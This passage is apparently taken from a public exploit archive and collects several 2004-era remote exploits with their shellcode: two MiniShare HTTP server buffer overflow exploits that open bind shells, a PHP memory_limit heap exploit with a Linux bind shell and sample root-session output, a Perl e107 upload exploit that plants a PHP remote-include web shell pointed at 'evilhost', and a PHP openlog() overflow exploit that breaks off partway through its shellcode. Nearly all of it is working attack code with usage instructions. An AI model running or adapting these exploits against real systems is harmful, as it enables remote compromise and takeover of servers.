"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
/*
//116 bytes, execute regedit.exe, XORed 0x88, hardcoded WinXP SP1 English
char scode+[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\xDD\x01\x6D\x09\x64\xC4\x88\x88\x88\xDB\x05\x F5\x3C\x4E\xCD\x7C\xFA\x4E\xCD"
"\x7D\xED\x4E\xCD\x7E\xEF\x4E\xCD\x7F\xED\x4E\xCD\x 70\xEC\x4E\xCD\x71\xE1\x4E\xCD"
"\x72\xFC\x4E\xCD\x73\xA6\x4E\xCD\x74\xED\x4E\xCD\x 75\xF0\x4E\xCD\x76\xED\x4E\xCD"
"\x77\x88\xE0\x8D\x88\x88\x88\x05\xCD\x7C\xD8\x30\x E8\x75\x6E\xFF\x77\x58\xE0\x89"
"\x88\x88\x88\x30\xEB\x10\x6F\xFF\x77\x58\x68\x61\x 63\x6B\x90";
//565 bytes, execute regedit.exe, alphanumeric, hardcoded WinXP SP1 English
char scode+[]=
"LLLLYhbSgCX5bSgCHQVPPTQPPaRVVUSBRDJfh2ADTY09VQa0tk afhXMfXf1Dkbf1TkbjgY0Lkd0TkdfhH"
"CfYf1LkfjiY0Lkh0tkjjOX0Dkkf1TkljxY0Lko0Tko0TkqjfY0 Lks0tks0Tkuj1Y0Lkw0tkw0tkyCjyY0"
"Lkz0TkzCC0tkzCCjmY0Lkz0TkzCC0TkzCCjhX0Dkz0tkzCC0tk zCCjPX0Dkz0TkzCC0tkzCCjfY0Lkz0T"
"kzCjjX0DkzC0TkzCCjeX0Dkz0tkzCC0TkzCCjvX0Dkz0tkzCC0 TkzCCj3X0Dkz0tkzCC0tkzCCjOX0Dkz"
"0tkzCjaX0DkzCChuucTX1DkzCCCC0tkzCCjaY0Lkz0TkzCC0tk zCjRY0LkzCfhNUfXf1Dkzf1TkzCCCfh"
"hhfYf1Lkzf1TkzCCChS4ciX1DkzCCCC0TkzCC0tkzCjKY0Lkz0 TkzCCfhzhfXf1Dkzf1TkzUvB3tLHCiS"
"r2K9Esr9Ele9E8g9Eqe9Ejd9Eni9EUt9EbD9Efe9Etx9E2e9EO ahpucTrEjPG2LLwhGhR4ciGcgSwzG";
*/
static char payload[5000];
char espxp1en[]="\x33\x55\xdc\x77"; //JMP ESP - user32.dll - WinXP SP1 English
char esp2k4en[]="\xb8\x9e\xe3\x77"; //JMP ESP - user32.dll - Win2k SP4 English
char espnt6en[]="\xf8\x29\xf3\x77"; //JMP ESP - kernel32.dll - WinNT SP6 English
void usage(char* us);
WSADATA wsadata;
void ver();
int main(int argc,char *argv[])
{
ver();
if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return -1;}
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, sizeB, sizeC, a, b, c;
char *target, *os;
if (argc==4){port=atoi(argv[3]);}
else port=80;
if (atoi(argv[1]) == 1){target=espxp1en;os="WinXP SP1 English";}
if (atoi(argv[1]) == 2){target=esp2k4en;os="Win2k SP4 English";}
if (atoi(argv[1]) == 3){target=espnt6en;os="WinNT SP6 English";}
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
cout<<"[+] target: "<<os<<endl;
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
case 0: {cout<<"[+] connection failed."<<endl;closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
cout<<"[+] connected, constructing the payload..."<<endl;
Sleep(1000);
sizeA=1787;
sizeB=414-sizeof(scode);
sizeC=10;
sz=sizeA+sizeB+sizeC+sizeof(scode)+17;
memset(payload,0,sizeof(payload));
strcat(payload,"GET ");
for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
strcat(payload,target);
for (b=0;b<sizeB;b++){strcat(payload,"\x41");}
strcat(payload,scode);
for (c=0;c<sizeC;c++){strcat(payload,"\x41");}
strcat(payload," HTTP/1.1\r\n\r\n");
Sleep(1000);
if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
Sleep(1000);
cout<<"[+] size of payload: "<<sz<<endl;
cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
return 0;
}
}
closesocket(s);
WSACleanup();
return 0;
}
void usage(char* us)
{
cout<<"USAGE: 101_mini.exe Target Ip Port\n"<<endl;
cout<<"TARGETS: "<<endl;
cout<<" [+] 1. WinXP SP1 English (*)"<<endl;
cout<<" [+] 2. Win2k SP4 English (*)"<<endl;
cout<<" [+] 3. WinNT SP6 English (*)"<<endl;
cout<<"NOTE: "<<endl;
cout<<" The port 80 is default if no port specified"<<endl;
cout<<" The exploit bind a shellcode to the port 101"<<endl;
cout<<" A wildcard (*) mean Tested."<<endl;
return;
}
void ver()
{
cout<<endl;
cout<<" "<<endl;
cout<<" ================================================== =[v0.1]===="<<endl;
cout<<" ====MiniShare, Minimal HTTP Server for Windows <= v1.4.1====="<<endl;
cout<<" =============Remote Buffer Overflow Exploit=================="<<endl;
cout<<" ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl;
cout<<" ================================================== ==========="<<endl;
cout<<" "<<endl;
}
// [2004-11-07]
80 MiniShare Remote Buffer Overflow Exploit (c source)
/*
no@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2
***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 80.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 4444..
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\Program Files\MiniShare>
Greetz to NtWaK0,kane,kamalo,foufz, and schap :)
http://NoPh0BiA.lostspirits.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <netinet/in.h>
#include <fcntl.h>
#define PORT 80
#define PORT1 4444
#define RET "\xB8\x9E\xE3\x77" /*2k sp2*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\x34\x 0a\x7c\xa8\x62"
"\x5d\xa4\x91\x10\x12\xa4\xb8\x08\x81\x7b\xf8\x4c\x 0b\xc5\x76\x7e"
"\x12\xa4\xa7\x14\x0b\xc4\x1e\x06\x43\xa4\xc9\xbf\x 0b\xc1\xcc\xcb"
"\xf6\x1e\x3d\x98\x32\xcf\x89\x33\xcb\xe0\xf0\x35\x cd\xc4\x0f\x0f"
"\x76\x0b\xe9\x41\xeb\xa4\xa7\x10\x0b\xc4\x9b\xbf\x 06\x64\x76\x6e"
"\x16\x2e\x16\xbf\x0e\xa4\xfc\xdc\xe1\x2d\xcc\xf4\x 55\x71\xa0\x6f"
"\xc8\x27\xfd\x6a\x60\x1f\xa4\x50\x81\x36\x76\x6f\x 06\xa4\xa6\x28"
"\x81\x34\x76\x6f\x02\x7c\x95\xba\x44\x21\x11\xcb\x dc\xa6\x3a\xb5"
"\xe6\x2f\xfc\x34\x0a\x78\xab\x67\x83\xca\x15\x13\x 0a\x2f\xfd\xa4"
"\x0b\x2f\xfd\x82\x13\x37\x1a\x90\x13\x5f\x14\xd1\x 43\xa9\xb4\x90"
"\x10\x5f\x3a\x90\xa7\x01\x14\xed\x03\xda\x50\xff\x e7\xd3\xc6\x63"
"\x59\x1d\xa2\x07\x38\x2f\xa6\xb9\x41\x0f\xac\xcb\x dd\xa6\x22\xbd"
"\xc9\xa2\x88\x20\x60\x28\xa4\x65\x59\xd0\xc9\xbb\x f5\x7a\xf9\x6d"
"\x83\x2b\x73\xd6\xf8\x04\xda\x60\xf5\x18\x02\x61\x 3a\x1e\x3d\x64"
"\x5a\x7f\xad\x74\x5a\x6f\xad\xcb\x5f\x03\x74\xf3\x 3b\xf4\xae\x67"
"\x62\x2d\xfd\x25\x56\xa6\x1d\x5e\x1a\x7f\xaa\xcb\x 5f\x0b\xae\x63"
"\xf5\x7a\xd5\x67\x5e\x78\x02\x61\x2a\xa6\x3a\x5c\x 49\x62\xb9\x34"
"\x83\xcc\x7a\xce\x3b\xef\x70\x48\x2e\x83\x97\x21\x 53\xdc\x56\xb3"
"\xf0\xac\x11\x60\xcc\x6b\xd9\x24\x4e\x49\x3a\x70\x 2e\x13\xfc\x35"
"\x83\x53\xd9\x7c\x83\x53\xd9\x78\x83\x53\xd9\x64\x 87\x6b\xd9\x24"
"\x5e\x7f\xac\x65\x5b\x6e\xac\x7d\x5b\x7e\xae\x65\x f5\x5a\xfd\x5c"
"\x78\xd1\x4e\x22\xf5\x7a\xf9\xcb\xda\xa6\x1b\xcb\x 7f\x2f\x95\x99"
"\xd3\x2a\x33\xcb\x5f\x2b\x74\xf7\x60\xd0\x02\x02\x f5\xfc\x02\x41"
"\x0a\x47\x0d\xbe\x0e\x70\x02\x61\x0e\x1e\x26\x67\x f5\xff\xfd";
struct sockaddr_in hrm;
void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
int conn(char *ip, int p)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(p);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr))) < 0 )
{
perror("connect");
exit(0);
}
return sockfd;
}
int main(int argc, char *argv[])
{
if(argc < 2)
{
printf("Usage: TARGET.\n");
exit(0);
}
char *buffer = malloc(2220),*B=malloc(30),*target=argv[1];
int x,y;
printf("\n***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***\n\n");
memset(buffer,'\0',2220);
memset(B,0x42,30);
memset(buffer,0x41,1787);
strcat(buffer,RET);
strcat(buffer,B);
strcat(buffer,shellcode);
if((x = conn(target,PORT)))
printf("[x] Connected to: %s on port %d.\n",target,PORT);
sleep(3);
printf("[x] Sending bad code..");
write(x,"GET ",4);
write(x,buffer,2220);
write(x," HTTP/1.1\r\n\r\n",13);
sleep(3);
printf("done.\n");
printf("[x] Trying to connect to: %s on port %d..\n",target,PORT1);
if((y=conn(target,PORT1)))
{
printf("[x] 0wn3d!\n\n");
shell(y);
}
}
// [2004-11-16]
80 PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit
/* Remote exploit for the php memory_limit vulnerability found by Stefan
* Esser in php 4 (<= 4.3.7) and php 5 (<= 5.0.0RC3).
*
* by Gyan Chawdhary ([email protected])
* (felinemenace.org/~gyan)
*
* Greets
* S.Esser for the vuln and mlxdebug.tgz, everything in the code is based on it.
* scrippie, gera, riq, jaguar, girish, n2n ...
*
* Vulnerability:
* The issue is well documented in the advisory.
*
* Exploitation:
* I cud not find a generic way to free a 40 byte chunk which could be later
* used by ALLOC_HASHTABLE. The exploit will construct a fake zend hash table
* which will be sent in the first request. The second request will kick in the
* memory interuption after allocating space for the hashtable and before it is
* initalized. The memory it will use for this allocation will contain the data
* from our previous request which includes the pDestructor pointer pointing to
* our nop+shellcode which is a part of the second request. This happens in the
* zend_hash_destory function.
*
* PS - The exploit is ugly, coded to test the vuln. If anyone knows the trick
* for 40 byte free() then plz drop me a mail. Tested on RH 8 php 4.3.7,
* Apache 2.0.49 with register_globals = On
*
* Gyan
*
*
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#define IP "127.0.0.1"
#define PORT 80
int sock;
struct sockaddr_in s;
char request1[]=
"POST /info.php?a[1]=test HTTP/1.0"
"Host: doesnotreallymatter\r\n"
"User-Agent: mlxdebug\r\n"
"Accept: text/html\r\n"
"Connection: close\r\n"
"Pragma: no-cache\r\n"
"Cache-Control: no-cache\r\n"
"Content-Type: multipart/form-data; boundary=------------ \r\n BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB \r\n";
char request2[]=
"---------------264122487026375\r\n"
"Content-Length: 472\r\n"
"\r\n"
"-----------------------------264122487026375\r\n"
"Content-Disposition: form-data; name=\"a[][]\"\r\n"
"\r\n"
"TESTTESTTESTTESTTESTTESTTESTTESTTESTTES \r\n"
"\r\n"
"-----------------------------264122487026375--\r\n";
char request3[]=
"POST /info.php?a[1]=test HTTP/1.0"
"Host: doesnotreallymatter\r\n"
"User-Agent: mlxdebug\r\n"
"Accept: text/html\r\n"
"Connection: close\r\n"
"Pragma: no-cache\r\n"
"Cache-Control: no-cache\r\n"
"Content-Type: multipart/form-data; boundary=-------------";
char request4[]=
"---------------264122487026375\r\n"
"Content-Length: 472\r\n"
"\r\n"
"-----------------------------264122487026375\r\n"
"Content-Disposition: form-data; name=\"a[][]\"\r\n"
"\r\n"
"TESTTESTTESTTESTTESTTESTTESTTESTTESTTES \r\n"
"-----------------------------264122487026375--\r\n";
/*Ripped shellcode. Runs on port 36864*/
char shell[]=
"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x 46\x0c"
"\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\x c6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\x c2\x89"
"\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x 4e\x0c"
"\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\x b0\x66"
"\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x 80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\x b0\x3f"
"\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x 4b\x0c"
"\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";
void xp_connect(char *ip)
{
char buffer[1024];
char temp[1024];
int tmp;
s.sin_family = AF_INET;
s.sin_port = htons(PORT);
s.sin_addr.s_addr = inet_addr(ip);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Cannot create socket\n");
exit(-1);
}
if((connect(sock,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 0)
{
printf("Cannot connect()\n");
exit(-1);
}
}
void xp_write(char *data)
{
if(write (sock, data, strlen(data)) < 0)
{
printf("write() failed\n");
exit(-1);
}
}
void xp_receive()
{
int tmp;
char buffer[1024*2];
if ( (tmp = read(sock, buffer, sizeof(buffer))) <= 0)
{
printf("read() failed\n");
exit(-1);
}
}
char fill[] = " \r\n %s \r\n ";
/*This function builds the main request. In destroy_uploaded_files_hash we
* need to pass zend_hash_apply to reach zend_hash_destroy.
* We set
* 1) ht->nApplyCount to 0x02020202 to pass HASH_PROTECT_RECURSION
* 2) p->pListNext = 0x00000000 to exit out of zend_hash_apply
* 3) ht->pDestructor = addr to nop+shellcode
* 0x402c22bc <zend_hash_destroy+184>: sub $0xc,%esp
* 0x402c22bf <zend_hash_destroy+187>: pushl 0x8(%esi)
* 0x402c22c2 <zend_hash_destroy+190>: call *%eax
* 0x402c22c4 <zend_hash_destroy+192>: add $0x10,%esp
*
* $eax = ht->pDestructor
*/
void build1(int size, int count)
{
char *p1, *p2;
char *b1, *b2;
int i;
int pot = 0xffffffff;
int got = 0x41414141;
int bot = 0x0818ef29; //0x0818ef78;//0x08189870; //0x402b6c08;
int sot = 0x02020202;
int ret = 0x081887a8;
b1 = (char *)malloc(size-8);
p1 = b1;
for (i=0; i<size-8; i+=36)
{
*( (int **)p1 ) = (int *)( pot );
p1+=4;
*( (int **)p1 ) = (int *)( got );
p1+=4;
*( (int **)p1 ) = (int *)( bot );
p1+=4;
*( (int **)p1 ) = (int *)( ret );
p1+=4;
*( (int **)p1 ) = (int *)( bot );
p1+=4;
*( (int **)p1 ) = (int *)( got );
p1+=4;
*( (int **)p1 ) = (int *)( bot );
p1+=4;
*( (int **)p1 ) = (int *)( sot );
p1+=4;
}
b2 = (char *)malloc(size+1);
p2 = b2;
sprintf(p2, fill, b1);
for(i=0; i<count; i++)
xp_write(b2);
}
/*Test function for resetting php memory , does not work properly with
* php_normalize_heap function */
void build2(int size, int count)
{
char *p1, *p2;
char *b1, *b2;
int i;
b1 = (char *)malloc(size-8);
p1 = b1;
memset(p1, '\x42', size-8);
b2 = (char *)malloc(size+1);
p2 = b2;
sprintf(p2, fill, b1);
for(i=0; i<count; i++)
xp_write(b2);
}
/*TODO*/
char *php_normalize_heap()
{
return;
}
/*Builds our shellcode with NOP's and the mem interuption request*/
void build3(int size, int count)
{
char *p1, *p2;
char *b1, *b2;
int i;
int pot = 0x90909090;
b1 = (char *)malloc(size-8);
p1 = b1;
for (i=0; i<size-8-strlen(shell); i+=4) {
*( (int **)p1 ) = (int *)( pot );
p1+=4;
}
p1 = b1;
p1+= size - 8 - strlen(shell);
strncpy(p1, shell, strlen(shell));
b2 = (char *)malloc(size+1);
p2 = b2;
sprintf(p2, fill, b1);
for(i=0; i<count; i++)
xp_write(b2);
}
void exploit()
{
int i;
printf("Stage 1: Filling mem with bad pdestructor ... ");
for (i=0; i< 5; i++)
{
xp_connect(IP);
xp_write(request1);
build1(5000, 1);
xp_write(request2);
close(sock);
}
printf("DONE\r\n");
printf("Stage 2: Triggering memory_limit now ... ");
xp_connect(IP);
xp_write(request3);
build3(8192, 255);
build3(7265, 1);
xp_write(request4);
printf("DONE\r\n");
printf("Shell on port 36864\r\n");
}
main()
{
/*No args, no vectors*/
exploit();
}
/*
* Using [][][][] arry its possible to exhaust mem for 1.3.* servers and
*trigger memlimit in _zval_copy_ctor after ALLOC_HASHTABLE
*
*
[root@localhost stuff]# ./cool
Stage 1: Filling mem with bad pdestructor ... DONE
Stage 2: Triggering mem_limit now ... DONE
Shell on port 36864
[root@localhost stuff]# telnet 127.0.0.1 36864
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
id;
uid=99(nobody) gid=4294967295 groups=4294967295
uname -a;
Linux localhost.localdomain 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
*/
// [2004-11-27]
80 e107 include() Remote Exploit
################################################## ##################
#
# _____ _
# | ___| | _____ ___
# | |_ | |/ _ \ \ /\ / /
# | _| | | (_) \ V V /
# |_| |_|\___/ \_/\_/
# Security Group.
#
# -=[ e107 remote sploit ]=-
# by sysbug
#
# Attack method:
# with this sploit u can send an include() vuln to a Host victim
# the upload go to /images/evil.php
#
# C:\Perl\bin>perl sploit.pl www.site.com
# -=[ e107 remote sploit ]=-
# by sysbug
# # www.site.com
# # OWNED OH YEAH!
# # get your evilc0de in:
# # www.site.com/images/evil.php?owned=http://evilhost/
# C:\Perl\bin>
#
# credits: ALL MY FRIENDS!
# HELP ? RTFM -> perl sploit.pl
################################################## ###################
use IO::Socket;
if(@ARGV < 1){
usage();
exit;
}
main();
sub main(){
print "-=[ e107 remote sploit ]=-\n";
print " by sysbug \n\n";
$host[0] = $ARGV[0];
if($host[0] =~ /\//){
($host[1],$host[2])=split(/\//,$host[0]);
$host[0] =~ /\/(.*)/;
$host[3] = "/";
$host[3] .= $1;
}
$host[1] = $host[0] if(!$host[1]);
@handlers =("e107_handlers","handlers");
print "# $host[1]\n";
foreach $handler(@handlers){
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php";
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die " s0k off\n";
print $socket "POST $path HTTP/1.1\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php\r\n";
print $socket "Accept-Language: pt\r\n";
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n";
print $socket "Accept-Encoding: gzip, deflate\r\n";
print $socket "User-Agent: l33t br0ws3r\r\n";
print $socket "Host: $host[1]\r\n";
print $socket "Content-Length: 1646\r\n";
print $socket "Connection: Keep-Alive\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n";
print $socket "/\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"vert\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"alt\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"horiz\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n";
print $socket "Content-Type: application/octet-stream\r\n\r\n";
print $socket "<? include(\$owned); ?>\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"align\"\r\n\r\n";
print $socket "baseline\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"border\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"constrain_prop\"\r\n\r\n";
print $socket "on\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "Refresh\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "OK\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"cancel\"\r\n\r\n";
print $socket "Cancel\r\n";
print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n";
@socket = <$socket>;
foreach $teste(@socket){
if($teste=~ /<title>Image Browser<\/title>/){
print "# OWNED OH YEAH!\n";
print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n";
$result = 1;
}
}
close($socket);
}
if($result){
exit;
}
print "# b4d upload!!";
}
sub usage(){
print "-=[ e107 remote sploit ]=-\n";
print " by sysbug \n\n";
print "# usage: perl $0 <host> \n";
}
# [2004-12-22]
80 PHP <= 4.3.7 openlog() Buffer Overflow Exploit
<?
################################################## #####################
############################# PUBLIC EXPLOIT #########################
################################################## #####################
## PHP v4.3.x exploit by The Warlock [BhQ], http://go.to/biohazardhq ##
################### mail:[email protected] ##################
################################################## ####################
############################ PUBLIC EXPLOIT ##########################
################################################## #####################
/* This "Proof of Concept" sploit is only for Win2k SP4 + PHP 4.3.5 on Apache
2.0.49*
Sploit tested with Apache 2.0.49 + PHP 4.3.5 on a Win2K SP4.
bugtraq says local exploit.
This bug is reported a long long time ago for v4.3.1
bugs.php.net does not have any status that refers to this bug while
reported.
The bug is still alive in v4.3.5 and probably newer versions as well,
CHANGELOG of versions to 4.3.7 does not mention the bugfix of openlog();
scenario :
--->
http://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt
BOOM....
netcat www.vulnerable.box 65535
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Apache Group\Apache2>
--->
Getting a shell is better then parsing commands to the weblog.
[email protected] wrote on bugtraq :
>* Buffer overflow in openlog()
>
>I've tried passing long parameters (and large integers) to openlog(). No
>crashes could be caused by this "exploit". I was unable to demonstrate any
>disruption to PHP via this "vulnerability", let alone complete control.
>Unless the vendor or the original reporter will confirm this with code
>(which was, oddly enough, MISSING from the original advisory), I don't
>believe this "flaw" (if it exists) can do any damage to a default
>production system.
*/
################################################## #####################
########################### PUBLIC EXPLOIT ###########################
################################################## #####################
// win32 shellcode: bind TCP/65535, size 399, By The Warlock [BhQ].
$gift = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\x02\x03";
$gift .= "\x02\x02\x83\xeb\xfc\xe2\xf4\xea\x55\x02\x02\x02\x 50\x57\x54\x55";
$gift .= "\x88\x6e\x26\x1a\x88\x47\x3e\x89\x57\x07\x7a\x03\x e9\x89\x48\x1a";
$gift .= "\x88\x58\x22\x03\xe8\xe1\x30\x4b\x88\x36\x89\x03\x ed\x33\xfd\xfe";
$gift .= "\x32\xc2\xae\x3a\xe3\x76\x05\xc3\xcc\x0f\x03\xc5\x e8\xf0\x39\x7e";
$gift .= "\x27\x16\x77\xe3\x88\x58\x26\x03\xe8\x64\x89\x0e\x 48\x89\x58\x1e";
$gift .= "\x02\xe9\x89\x06\x88\x03\xea\xe9\x01\x33\xc2\x5d\x 5d\x5f\x59\xc0";
$gift .= "\x0b\x02\x5c\x68\x33\x5b\x66\x89\x1a\x89\x59\x0e\x 88\x59\x1e\x89";
$gift .= "\x18\x89\x59\x0a\x50\x6a\x8c\x4c\x0d\xee\xfd\xd4\x 8a\xc5\x83\xee";
$gift .= "\x03\x03\x02\x02\x54\x54\x51\x8b\xe6\xea\x25\x02\x 03\x02\x92\x03";
$gift .= "\x03\x02\xb4\x1b\x1b\xe5\xa6\x1b\x73\xeb\xe7\x4b\x 85\x4b\xa6\x18";
$gift .= "\x73\xc5\xa6\xaf\x2d\xeb\xdb\x0b\xf6\xaf\xc9\xef\x ff\x39\x55\x51";
$gift .= "\x31\x5d\x31\x30\x03\x59\x8f\x49\x23\x53\xfd\xd5\x 8a\xdd\x8b\xc1";
$gift .= "\x8e\x77\x16\x68\x04\x5b\x53\x51\xfc\x36\x8d\xfd\x 56\x06\x5b\x8b";
$gift .= "\x07\x8c\xe0\xf0\x28\x25\x56\xfd\x34\xfd\x57\x32\x 32\xc2\x52\x52";
$gift .= "\x53\x52\x42\x52\x43\x52\xfd\x57\x2f\x8b\xc5\x33\x d8\x51\x51\x6a";
$gift .= "\x01\x02\xfd\xfd\x8a\xe2\x68\x12\x53\x55\xfd\x57\x 27\x51\x55\xfd";
$gift .= "\x56\x2a\x51\x56\x54\xfd\x57\x22\x8a\xc5\x6a\x41\x 4e\x46\x02\x8b";
$gift .= "\xe0\x85\xf8\x33\xc3\x8f\x7e\x26\xaf\x68\x17\x5b\x f0\xa9\x85\xf8";
$gift .= "\x80\xee\x56\xc4\x47\x26\x12\x46\x65\xc5\x46\x26\x 3f\x03\x03\x8b";
$gift .= "\x7f\x26\x4a\x8b\x7f\x26\x4e\x8b\x7f\x26\x52\x8f\x 47\x26\x12\x56";
